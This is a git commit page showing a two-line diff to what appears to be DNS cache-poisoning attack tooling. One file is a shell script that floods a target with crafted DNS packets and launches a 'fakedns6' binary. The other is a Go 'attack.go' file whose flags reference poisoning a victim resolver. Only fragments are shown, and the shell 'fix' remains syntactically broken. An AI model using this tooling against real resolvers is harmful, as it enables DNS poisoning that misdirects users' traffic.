diff options
| author | 韩丁康 <[email protected]> | 2023-11-16 16:19:46 +0800 |
|---|---|---|
| committer | 韩丁康 <[email protected]> | 2023-11-16 16:19:46 +0800 |
| commit | d66f0baecc69091d92cd6c9ad114d94811829ade (patch) | |
| tree | 6ce0f95e233d3b1b9487df1e4d8d220f3a8631f5 | |
| parent | 0badf10cef4430b6e401d2053c5baf596c536870 (diff) | |
20231116-工具代码测试-第4次(修复shell语法问题,go参数重复定义问题)
| -rw-r--r-- | dns_query.sh | 2 | ||||
| -rw-r--r-- | src/ucr.edu/fakedns6/attack.go | 2 |
2 files changed, 2 insertions, 2 deletions
diff --git a/dns_query.sh b/dns_query.sh index d8387de..1528df1 100644 --- a/dns_query.sh +++ b/dns_query.sh @@ -18,7 +18,7 @@ cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin # fire! echo "fire" udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 -a=$RANDOM % 10 +a=$($RANDOM % 10) echo $a if a -gt 8; then ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1 >/dev/null 2>&1 diff --git a/src/ucr.edu/fakedns6/attack.go b/src/ucr.edu/fakedns6/attack.go index d72cc9a..435d07d 100644 --- a/src/ucr.edu/fakedns6/attack.go +++ b/src/ucr.edu/fakedns6/attack.go @@ -458,7 +458,7 @@ func main() { soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)") //特殊用途 - isfake := flag.String("f", "0", "") + isfake := flag.String("F", "0", "") flag.Parse() //gatewayMac, _ := net.ParseMAC(*gateWayMacStr) Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter, |
